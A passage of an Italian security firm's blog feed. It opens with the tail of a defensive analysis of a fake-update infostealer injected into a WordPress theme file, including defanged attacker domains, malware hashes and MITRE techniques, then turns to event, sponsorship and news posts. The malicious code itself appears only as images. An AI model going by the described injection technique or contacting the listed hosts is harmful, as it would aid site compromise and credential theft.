&lt;li&gt;Il secondo URL, invece, fa riferimento alla pagina che contiene il modale: “*&lt;a href=&quot;https://d1x9q8w2e4%5B.%5Dxyz/8OtaBr/?added=1714577662*%E2%80%9D&quot;&gt;https://d1x9q8w2e4[.]xyz/8OtaBr/?added=1714577662*”&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1216px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/035f2a444434e268587d72c8a194de88/061c7/ChromeInfostealer11.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAx0lEQVR42k3K24rCMBgE4D6Je6Htn1azlJrENrbRaFIjUhWP6IVW8QDi+gr76mZdFxa+i5lhnNVxxROhtFHKSKmSJIuTNBPSZkuIHufCji8pb3ezfN4xS8bVrrw4Zq2h5hNCmxH5xKHnggUecn8CeoE/HoLAxxRhUvmoFsXUGWzHEDDKeySWOGq7ftOCBoU6sX7rG4q8OguowkxVIRzPNs7i8WjlpV7c+rNra1CyfE/1ThQnOTmno6Ot/8XmoJd3e+bD/eHr+wmYbziC2UrBtAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Codice malevolo3&quot; title=&quot;&quot; src=&quot;/website/static/035f2a444434e268587d72c8a194de88/061c7/ChromeInfostealer11.png&quot; srcset=&quot;/website/static/035f2a444434e268587d72c8a194de88/804b2/ChromeInfostealer11.png 384w,
/website/static/035f2a444434e268587d72c8a194de88/e5715/ChromeInfostealer11.png 768w,
/website/static/035f2a444434e268587d72c8a194de88/061c7/ChromeInfostealer11.png 1216w&quot; sizes=&quot;(max-width: 1216px) 100vw, 1216px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
   &lt;p&gt;&lt;em&gt;Dettaglio del traffico network prodotto dal portale durante l’esecuzione del codice malevolo&lt;/em&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;All’interno del secondo URL, si scopre un ulteriore Javascript, riportato di seguito:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1218px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/6805da904ffa21428802b3ec43592745/c929c/ChromeInfostealer12.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 28.125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA6ElEQVR42mWQwW7DIBBE+f+Pi+KmNYnjKnbAxl7MAoaFHAtuqx4qPT3NjISQlimltEGiXIiUEr2IXvGo34SUA6X/UMpMGA8WlTerx2U30sHk9Lrbsii/Sadxsz5ET+TjL0feI7GhkaoV47l/doPgw/3E+/NN3Mfh43PoHo9Lb4R2xjn01vjiyhHqY3gbt05B8yyuXKSuiI3P5qbgNOpuBi6hlWszwnUCPkE7wbvwLjC4zj8Tl7pXBehmuzkELC6/WePsirggKrTa4WLLUuruAwuRQqDDsbqSYkox55hyDZX8V3NdyhUp5y+F8kwt5a1eigAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Codice malevolo4&quot; title=&quot;&quot; src=&quot;/website/static/6805da904ffa21428802b3ec43592745/c929c/ChromeInfostealer12.png&quot; srcset=&quot;/website/static/6805da904ffa21428802b3ec43592745/804b2/ChromeInfostealer12.png 384w,
/website/static/6805da904ffa21428802b3ec43592745/e5715/ChromeInfostealer12.png 768w,
/website/static/6805da904ffa21428802b3ec43592745/c929c/ChromeInfostealer12.png 1218w&quot; sizes=&quot;(max-width: 1218px) 100vw, 1218px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1220px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/68702457c676538058e4d52ccc374919/cd138/ChromeInfostealer13.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 35.15625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA90lEQVR42lWQbW+DMAyE+f//bVO3FUo71hEIkDjQNm+EjzuTddIk6+F8ss4ORYirfXhnA2itt3dv3V7QLvznLvxOfNZUOOfNZTTNhFoEZTFftfmc5pbA3/ZvpjemUeaq3MMXWEWV1G9Cv3cQGNIHwe1BUClhqtdvKnsF86PjmbIHob2PBQLoJOk86mOPaToNVA10zEJiM7ind9nJ1JX0LhR46vyl8nnmPFI9mMuEOLPHsV8jq+ezLyPHNRPWqpfW3flshxg+FYSLa+thFrQIs8gZL8SPQHuDbonbgU04vDmmzcfVh8jMFWJIKWyJmWt78il8SmvafgDe7n4V5nujYQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Codice malevolo5&quot; title=&quot;&quot; src=&quot;/website/static/68702457c676538058e4d52ccc374919/cd138/ChromeInfostealer13.png&quot; srcset=&quot;/website/static/68702457c676538058e4d52ccc374919/804b2/ChromeInfostealer13.png 384w,
/website/static/68702457c676538058e4d52ccc374919/e5715/ChromeInfostealer13.png 768w,
/website/static/68702457c676538058e4d52ccc374919/cd138/ChromeInfostealer13.png 1220w&quot; sizes=&quot;(max-width: 1220px) 100vw, 1220px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Quest’ultimo snippet di codice crea il modale malevolo. Se lo eseguiamo nella console di sviluppo del browser, è possibile far comparire il modale in qualsiasi pagina si stia navigando.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1218px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/e46cb42fc0045119c4fa12b80329373e/c929c/ChromeInfostealer14.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 64.32291666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAABYlAAAWJQFJUiTwAAACrElEQVR42n2P3U9SYRzHz19RWpuAwHlTTORFzCFw5O2cw0uIRiu0WRetspk5b9q66qp/oQtz02zOhIMoSK1cJkQcOLyEc2tlKjgNTJ2hzm7sgbVubH333fN8nt+eZ9/nC7lcPVaLk7Z0OozW60aL20D3kna3niJ0ZkJHarUmrZYE0KajtTpST1BWaydJOmiq49bt+9DsbMDjYbxehmF8Pq/Px/gYj5cB4POXedo/F5gJBfxzQX8o6H8VmA4Fgf3BGe/8/Bsom82mU6l0Jv1HmfRfznzKJMIfXnjCo0xiZIodnmSHXwLHn03Fn06w7+Y5iOO4WCzGnhKYJRLxhdDbJ5OfHzM7DyeKg8+3B8eLD8aKQ+PFuyOFUd8ylEwmwdX4vxRjY8ssW9jazK1+LWzmClv53cL6z+LaNoDtrZ211f8/ZpdjsePj44PDo/3SQam0z+WOxuKHP0q/Tk5O9vJ5CHRLVMSdEhhlo9Gd9fXdjY3vK9+KK1+iqfzI63x+Jb+Xz20sLVU6gxQuCdLZOFtZKy4fQPNYNBwG/hiJRCMR7sPiEvs+Gl5cXFhIcRzkvnqNMppsFidlpCijmTKYSIORNpJWM2WxWGiaJknSXBZpJsl2vZ5o1xsMBrVa3dPdAynQeuQ8DPNEIr5IXCMWV/P4Z6t41WfEVdWNMILhdfV4HQ42HMdQFBaLUQTBMYzP4xn0BkgpaUIQBYJLhBgsEKNCMVqLwTwYRUSYQiKVylUyeQuwXAFAdaFRIWmQYXgDXwAbTTQkRVCQx4MbBCJcgKI1tWiNsPacoPwLp6L1UrPWoWhzKDUOla6jWQMM2C5Xq4X1brMNIjVaneIiodIQyhaiuaVNqlQ3yVplUkImG7C7Bju7hzrcA053/+XeezZXn7Wrz9bVb79yQ295dPPOb2+goVCQHrO8AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Codice malevolo4&quot; title=&quot;&quot; src=&quot;/website/static/e46cb42fc0045119c4fa12b80329373e/c929c/ChromeInfostealer14.png&quot; srcset=&quot;/website/static/e46cb42fc0045119c4fa12b80329373e/804b2/ChromeInfostealer14.png 384w,
/website/static/e46cb42fc0045119c4fa12b80329373e/e5715/ChromeInfostealer14.png 768w,
/website/static/e46cb42fc0045119c4fa12b80329373e/c929c/ChromeInfostealer14.png 1218w&quot; sizes=&quot;(max-width: 1218px) 100vw, 1218px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
   &lt;p&gt;&lt;em&gt;Dettaglio dell’esecuzione del codice malevolo sulla homepage di Google&lt;/em&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Una ricerca del codice Javascript offuscato, all’interno dei vari file della web app, ci ha consentito di scoprire che tale codice è stato iniettato all&apos;interno del file “/site/wwwroot/wp-includes/theme.php”.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1214px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/ec5b5fcd756f2096b7ffa3ff1f4e5985/f8836/ChromeInfostealer15.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 23.177083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAo0lEQVR42oXKS5LCMAwEUJuZFGATyZ/IkhyTScz974gH9tD1qqsXbbR3Pfbaj9GDrCursPBnopJyMjfIM0QYPMItYlgQM1xncIAO0QG84Ev0GDxGH9Kc3OTMJtux9r31dn/81b0mqVkqqWbRrJKFwlICDWNwLCX+b0kcHJqLv0KhOYRpOv/8TvZkjbXmW+z7I1Latt1bK6UQLaxMzMu3EBEiPgFDdhQqKG9hdgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Codice malevolo6&quot; title=&quot;&quot; src=&quot;/website/static/ec5b5fcd756f2096b7ffa3ff1f4e5985/f8836/ChromeInfostealer15.png&quot; srcset=&quot;/website/static/ec5b5fcd756f2096b7ffa3ff1f4e5985/804b2/ChromeInfostealer15.png 384w,
/website/static/ec5b5fcd756f2096b7ffa3ff1f4e5985/e5715/ChromeInfostealer15.png 768w,
/website/static/ec5b5fcd756f2096b7ffa3ff1f4e5985/f8836/ChromeInfostealer15.png 1214w&quot; sizes=&quot;(max-width: 1214px) 100vw, 1214px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;5. IOCs &lt;a id=&quot;5-IOCs&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tipo&lt;/th&gt;
&lt;th&gt;Nome&lt;/th&gt;
&lt;th&gt;Hash (SHA256)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;URL&lt;/td&gt;
&lt;td&gt;cdnforfiles[.]xyz&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URL&lt;/td&gt;
&lt;td&gt;rtattack[.]baqebei1[.]online&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URL&lt;/td&gt;
&lt;td&gt;bsc-dataseed1[.]binance[.]org&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URL&lt;/td&gt;
&lt;td&gt;d1x9q8w2e[4.]xyz&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Archivio compromesso&lt;/td&gt;
&lt;td&gt;data.zip&lt;/td&gt;
&lt;td&gt;e3322159f52e849fe6e5dd0d264e591b6361ee4d08ec81b490b875e41b60ca2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Eseguibile malevolo&lt;/td&gt;
&lt;td&gt;Winnc.exe&lt;/td&gt;
&lt;td&gt;34a31ce56c97fdc7a5db20c1dec741830c75d97b87c11c1658754419213ff6d7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/br&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/br&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;6. TTPss &lt;a id=&quot;6-TTPs&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Di seguito viene riportata la lista delle Tattiche, Tecniche e Procedure (TTP) effettuate dall’attaccante e osservate nelle analisi effettuate:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;ID&lt;/th&gt;
&lt;th&gt;Nome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T1659/&quot;&gt;T1659&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T1659/&quot;&gt;Content Injection &lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T1059/&quot;&gt;T1059.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T1059/001/&quot;&gt;PowerShell &lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T1555/&quot;&gt;T1555&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T1555/&quot;&gt;Credentials from Password Stores &lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T1055/&quot;&gt;T1055&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T1055/&quot;&gt;Process Injection&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/br&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/br&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;7. References &lt;a id=&quot;7-references&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;[1] &lt;a href=&quot;https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates&quot;&gt;Proofpoint&lt;/a&gt;
[2] &lt;a href=&quot;https://www.binance.com/&quot;&gt;Binance&lt;/a&gt;
&lt;/br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Grazie!&lt;/em&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[ANTIFRAGILE | Come caos e complessità rendono migliori le nostre difese digitali]]></title><link>https://www.certego.net/blog/certego-antifragile-coming-soon/</link><guid isPermaLink="false">certego-antifragile-coming-soon</guid><category><![CDATA[Event]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi]]></dc:creator><pubDate>Mon, 03 Jun 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Quest’anno il Cybersecurity Event di Certego ci porterà nel Labirinto della Masone&lt;/strong&gt;, il labirinto più grande del mondo e all’interno della proprietà di Franco Maria Ricci, noto editore e collezionista d’arte.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Martedì 4 giugno&lt;/strong&gt; sarà una giornata di incontri e di progetti. Giornalisti, accademici e esperti in materia di cybercrime guideranno i partecipanti attraverso le insidie del labirinto digitale in cui ci troviamo, suggerendo consigli pratici per navigare al meglio questo ambiente complesso e guidare la nostra realtà aziendale fra evoluzione e antifragilità&lt;/p&gt;
&lt;p&gt;Scopri i dettagli dell&apos;evento.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego è Silver Sponsor di Modena Pride 2024]]></title><link>https://www.certego.net/blog/certego-silver-sponsor-di-modena-pride/</link><guid isPermaLink="false">certego-silver-sponsor-di-modena-pride</guid><category><![CDATA[News]]></category><pubDate>Wed, 22 May 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Quest&apos;anno anche Certego ha deciso di sostenere il Modena Pride, l&apos;evento dedicato alla celebrazione dell’orgoglio LGBTQIA+ per rivendicare parità dei diritti e maggiore giustizia sociale, promuovendo la partecipazione dell’intera cittadinanza.&lt;/p&gt;
&lt;p&gt;Siamo orgogliosi di essere Silver Sponsor dell’edizione 2024, che si terrà sabato 25 maggio, organizzata da Arcigay Modena “Matthew Shepard” e Agedo Bologna.&lt;/p&gt;
&lt;p&gt;La sponsorizzazione riflette &lt;strong&gt;la precisa volontà di Certego di investire sull’inclusività e sulla parità di trattamento per tutti i propri dipendenti e collaboratori&lt;/strong&gt;. Crediamo fermamente che l’orientamento sessuale, il colore della pelle, il credo politico o religioso e tutte le altre mille differenze che distinguono ognuno di noi siano un bene prezioso, da conservare, custodire e valorizzare. Riteniamo che &lt;strong&gt;il benessere di un’azienda inizi dal modo in cui ciascuno si percepisce all’interno di essa&lt;/strong&gt;. Per questo vogliamo sottolineare ancora una volta come Certego sia, per definizione e in tutto e per tutto, un posto sicuro! 🌈&lt;/p&gt;
&lt;p&gt;Tutti i dettagli del programma dell’evento sono disponibili sulla pagina ufficiale:
&lt;a href=&quot;https://modenapride.it/&quot;&gt;Modena Pride&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Aprile 2024]]></description><link>https://www.certego.net/blog/whitepaper-aprile-2024-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-aprile-2024-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Mon, 13 May 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di aprile 2024, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - May 10th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-may-10/</link><guid isPermaLink="false">weekly-highlights-may-10</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 09 May 2024 22:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;NIST released CSF 2.0: Small Business Quick Start.&lt;/h2&gt;
&lt;h3&gt;#Resources&lt;/h3&gt;
&lt;p&gt;The guide is designed to assist small and medium-sized enterprises (SMEs) in initiating cybersecurity risk management and reduction efforts.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.nist.gov/blogs/cybersecurity-insights/take-tour-nist-cybersecurity-framework-20-small-business-quick-start&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;New Latrodectus malware attacks use Microsoft, Cloudflare themes.&lt;/h2&gt;
&lt;h3&gt;#Malware&lt;/h3&gt;
&lt;p&gt;The malware is being spread in phishing campaigns using Microsoft Azure and Cloudflare lures to appear legitimate and evade detection by email security platforms.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/new-latrodectus-malware-attacks-use-microsoft-cloudflare-themes/?&amp;#x26;web_view=true#google_vignette&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Iranian threat actor APT42 pose as journalists to harvest credentials and access cloud data.&lt;/h2&gt;
&lt;h3&gt;#Cyberwar&lt;/h3&gt;
&lt;p&gt;The Iranian state-backed hacking outfit called APT42 is making use of enhanced social engineering schemes to infiltrate target networks and cloud environments.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://thehackernews.com/2024/05/apt42-hackers-pose-as-journalists-to.html&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Dell warns of data breach, 49 million customers allegedly affected.&lt;/h2&gt;
&lt;h3&gt;#Data Breach&lt;/h3&gt;
&lt;p&gt;Dell is warning customers of a data breach after a threat actor claimed to have stolen information for approximately 49 million customers.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/dell-warns-of-data-breach-49-million-customers-allegedly-affected/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[#FIRSTCON24]]></title><description><![CDATA[Certego tra gli speaker della conferenza annuale del FIRST]]></description><link>https://www.certego.net/blog/firstcon-certego-tra-gli-speaker-della-conferenza-annuale-del-first/</link><guid isPermaLink="false">firstcon-certego-tra-gli-speaker-della-conferenza-annuale-del-first</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 02 May 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego è stata selezionata tra le aziende che parteciperanno in qualità di &lt;strong&gt;speaker al #FIRSTCON24&lt;/strong&gt;, il principale evento internazionale organizzato dal FIRST (the global Forum of Incident Response and Security Teams), che quest’anno avrà luogo a Fukuoka, in Giappone.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lunedì 10 giugno 2024&lt;/strong&gt; presenteremo alla platea la soluzione &lt;strong&gt;IntelOwl&lt;/strong&gt;, la piattaforma di Threat Intelligence Investigation di Certego, integrata all’interno della nostra piattaforma di Unified Security Operations, PanOptikon®, che facilita il lavoro quotidiano degli analisti di sicurezza informatica, consentendo loro di risparmiare tempo e aumentare l&apos;efficienza delle operazioni di Detection e Incident Response.&lt;/p&gt;
&lt;p&gt;Il #FIRSTCON24 rappresenta uno degli &lt;strong&gt;appuntamenti internazionali di riferimento nell&apos;ambito della sicurezza informatica globale&lt;/strong&gt;; un&apos;occasione eccellente per lo scambio di esperienze, approfondimenti sugli strumenti di cybersecurity più avanzati, e l’analisi delle metodologie e tattiche più all&apos;avanguardia impiegate dai cybercriminali.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;La partecipazione di Certego al FIRSTCON24 testimonia il nostro costante impegno nello sviluppare soluzioni tecnologiche proprietarie. Questo approccio ci consente di adattare e affinare rapidamente le nostre soluzioni in risposta alle mutevoli sfide della cybersecurity, per anticipare e contrastare efficacemente le tecniche di attacco sempre più sofisticate, mantenendo così un vantaggio competitivo sugli attaccanti.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Crediamo che la collaborazione sia fondamentale per affrontare efficacemente le sfide della sicurezza informatica. Questa filosofia di cooperazione non solo arricchisce le nostre competenze e capacità, ma contribuisce anche a consolidare la comunità di sicurezza globale, sviluppando un ecosistema più robusto e resistente alle minacce del cybercrime.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.first.org/conference/2024/program/&quot;&gt;Scopri il programma della conferenza&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego PanoptiCON2024]]></title><description><![CDATA[ANTIFRAGILE: come caos e complessità rendono migliori le nostre difese digitali]]></description><link>https://www.certego.net/blog/panopticon-venti-ventiquattro/</link><guid isPermaLink="false">panopticon-venti-ventiquattro</guid><category><![CDATA[Blog]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 24 Apr 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;PanoptiCON2024&lt;/strong&gt;, il Cybersecurity Event di Certego, ci porterà nel Labirinto della Masone.
Il labirinto più grande del mondo esteso su 7 ettari di terreno ricoperto da canne di bambù all’interno della proprietà di Franco Maria Ricci, noto editore e collezionista d’arte &lt;a href=&quot;https://www.labirintodifrancomariaricci.it/&quot;&gt;(labirintodifrancomariaricci.it)&lt;/a&gt;
Certego invita clienti e partner in un luogo simbolico, per raccontare il fragile spazio del complicato labirinto digitale nel quale ci muoviamo e per suggerire consigli pratici al fine di trovare la dimensione più adatta alla nostra realtà aziendale fra evoluzione e antifragilità.&lt;/p&gt;
&lt;p&gt;Nel 2023 abbiamo affrontato la forma dell’acqua per descrivere nuove “forme” di adattamento e difesa. Anche quest’anno vogliamo partire da metafore mutuate da madre natura, origine e custode di evoluzione. La natura evolve. L’evoluzione naturale è un comportamento messo in atto dagli organismi per modificarsi a fronte di condizioni avverse. Non è basata solo sulla protezione degli organismi, ovvero su renderli più robusti o resilienti, ma è basata sul cambiamento. Siamo continuamente esposti a rischi che possono danneggiarci.&lt;/p&gt;
